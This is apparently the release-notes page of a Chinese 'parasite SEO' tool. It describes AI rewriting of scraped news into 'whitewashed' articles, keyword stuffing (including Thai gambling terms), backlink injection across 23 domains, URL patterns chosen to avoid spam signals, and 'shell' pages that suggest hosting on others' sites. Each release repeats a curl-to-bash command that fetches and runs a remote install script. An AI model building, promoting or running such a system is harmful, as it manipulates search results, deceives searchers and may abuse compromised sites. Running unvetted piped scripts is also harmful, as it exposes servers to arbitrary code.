  • AI 自动探测同主域真站 URL 模式(Gemini 2.5 Flash Lite)
📑 业务路径 URL(v1.14.14)
  • 旧:?view=สล็อต(动态 PHP + 关键词裸露,spam 信号)
  • 新:/th/StudentResources/12.html(PascalCase 英文业务名,对齐同行 SEO 友好风格)
  • AI 自动生成 50-100 个 PascalCase 业务路径池
🔗 SEO 外链注入
  • 23 域名 + 30 锚文本(关键词/通用动作/引用/转化引导四类混合)
  • URL 格式 /html/N.html,匹配主流站群路由
⚠️ 重要变更
  • 默认前端口仍为 80,如服务器已有 nginx/宝塔需手动改 front_addr 为其他端口
  • 升级保留:state/data/、admin 密码、shell 配置全部不动
  • 老透传分支 v1.1.x 仍可用,新老路径并存
安装 / 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.11.18

2026-06-05·11.1 MB

v1.11.18 — 寄生虫 SEO 系统持续优化

修复 / 优化
  • 升级到 v1.11.18 持续优化版本
  • 二进制 + 模板 同步打包(嵌入 + 外置 tar.gz 双保险)
  • 默认 config.yaml 提供完整 spider_agents 列表
安装 / 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

```

升级保留:

  • state/ 状态目录
  • data/ 数据目录(关键词 / 文章 / 短句)
  • 现有 admin 密码

新装默认:

  • Front 端口 80
  • Admin 端口 9091
  • 默认 admin 用户名 / 随机密码(看 systemd unit SP_ADMIN_PASS)

v1.11.7

2026-05-28·11.0 MB

107 测试服已运行 v1.11.7(最新)。所有功能完整:

✅ 文章模式 - 真实新闻全洗白

✅ 嵌入模板 - 二进制 + 模板永远同步

✅ 真实图片 - Picsum 摄影图替代黑色 SVG

✅ 正规分类 - หน้าแรก/ข่าวเด่น/บันเทิง... 8 个新闻栏目

✅ 多国家分组 - Group + KeywordGroup + AI 端点 + 时段

✅ AI 一键创建采集源 - URL → 全字段配置

✅ 关键词 tag 系统 - 单数据源 + 自动聚合

✅ AI 自动打 tag - 一键分类 2199 关键词

✅ ล่าสุด 站内化 - 内链传权重,PV 留住

v1.11.2

2026-05-28·11.0 MB

现在:点击后会切到采集源管理 tab,打开新增对话框,所有 AI 推断出的字段(link_pattern/page_pattern/selector)已预填。用户能:

  • ✅ 改名字
  • ✅ 选目标语言(泰/越/印尼/中/英)
  • ✅ 选目标分组
  • ✅ 选关键词分组
  • ✅ 选 AI 端点
  • ✅ 设采集时段(带快捷按钮)
  • ✅ 设代理模式
  • ✅ 默认禁用,配完确认再启用

2. ✅ 没有时间选择 → 加快捷预设按钮

现在表单的「采集时段」下面有 5 个快捷按钮:

[全天] [凌晨 0-7,22-23] [上午 8-12] [下午 13-18] [晚上 19-23]

一键填充,不用手动输区间格式。

3. ✅ 中文翻译其他国家语言 → 已支持

表单里「目标语言」是下拉选择,5 种语言:

  • 泰语 / 越南语 / 印尼语 / 中文 / 英语

之前 AI 一键创建后跳过了这一步,现在预填表单后用户能选任何语言。

工作流(v1.11.2)

1. 内容采集 → 🧠 AI 智能采集

2. 输 URL → 🔍 AI 分析

3. 看 AI 推断的规则

4. 点 💾 保存为采集源

5. 自动跳转到「采集源管理」tab + 弹出新增对话框

6. 配置:

  • 名字(改成中文易记)
  • 目标语言(中文/泰语/...)
  • 目标分组(绑到 news_cn/news_th/...)
  • 关键词分组
  • 采集时段(点快捷按钮)
  • 代理模式
  • ✅ 启用

7. 保存

v1.11.1

2026-05-28·11.0 MB

v1.11.1 修复内容

🐛 AI 分析 JSON 截断问题

症状:你测试 https://www.lfnews.cn/portal.php?mod=list&catid=7 时报错:

解析 JSON 失败 (unexpected end of JSON input),

原始返回: {"link_pattern":"portal\\.php\\?mod=view&aid=\\d+","page_pattern":"p

ortal.php?mod=list&catid=7&page={page}

JSON 在 {page} 后被截断,缺 ","selector":"...","sample_links":[...]}。

✅ 三层修复

1. Prompt 紧凑化

  • 之前:要求返回 3-5 sample_links
  • 现在:要求返回 2 sample_links + 单行紧凑 JSON
  • 节省 ~50% token,AI 不容易超 max_tokens

2. JSON 容错补全 tryRecoverPartialJSON

即使 AI 返回不完整,也能:

  • 自动补全未闭合的引号
  • 自动补缺失的 selector/page_pattern/sample_links 字段
  • 自动补闭合 }
  • 例如:

输入: {"link_pattern":"foo","page_pattern":"bar?p={page}

补全后: {"link_pattern":"foo","page_pattern":"bar?p={page}","selector":"","sample_links":[]}

3. 友好错误提示

  • 之前:unexpected end of JSON input(看不懂)
  • 现在:AI 响应不完整,可能被 token 限制截断(用户秒懂)

v1.11.0

2026-05-28·11.0 MB

v1.11.0 完整改动

🆕 4 个新字段(每个采集源)

  • 目标分组 (group) — 该采集源所有文章归此分组
  • 关键词分组 (keyword_group) — AI 改写时取关键词嵌入正文的池
  • AI 端点 (ai_endpoint_id) — 指定该源用哪个 AI 端点
  • 采集时段 (allow_hours) — per-source 的 "0-7,22-23" 格式
  • 代理模式 (proxy_mode) — auto / force / direct

🆕 2 个新管理页(内容采集 → 子标签)

  • 🗂 分组管理 — 创建/编辑/删除分组(website/model/blocked 三类)
  • 🔠 关键词分组 — 创建/编辑词包(绑定语言+关键词列表)

🆕 文章模式增加分组绑定

  • 后台 → SEO → 📰 文章模式 → 「绑定分组」下拉
  • 留空 = 显示全集
  • 选某分组 = 该 shell 只展示该分组的文章 + sitemap 也只列该分组

🆕 后端逻辑

  • CollectArticle 入库时自动跟随 source.group
  • 调度器尊重 per-source allow_hours(不再受全局 schedule 影响)
  • serveArticle fallback / serveSitemap 都按 articleMode.group 过滤

v1.10.17

2026-05-28·11.0 MB

v1.10.17 修复内容

🐛 问题根因

模板设计错误:tpl04 有 4 个 {wenzhang},tpl05 有 9 个,tpl06 有 5 个。每个 {wenzhang} 都会渲染完整一篇 1500-3000 字文章,导致:

  • tpl05 一个 URL 显示 9 篇相同文章 = 超长页面
  • tpl04 显示 4 篇相同文章
  • tpl06 显示 5 篇相同文章

历史版本均通过 wztseo.com 自托管 CDN 提供下载,长期可用。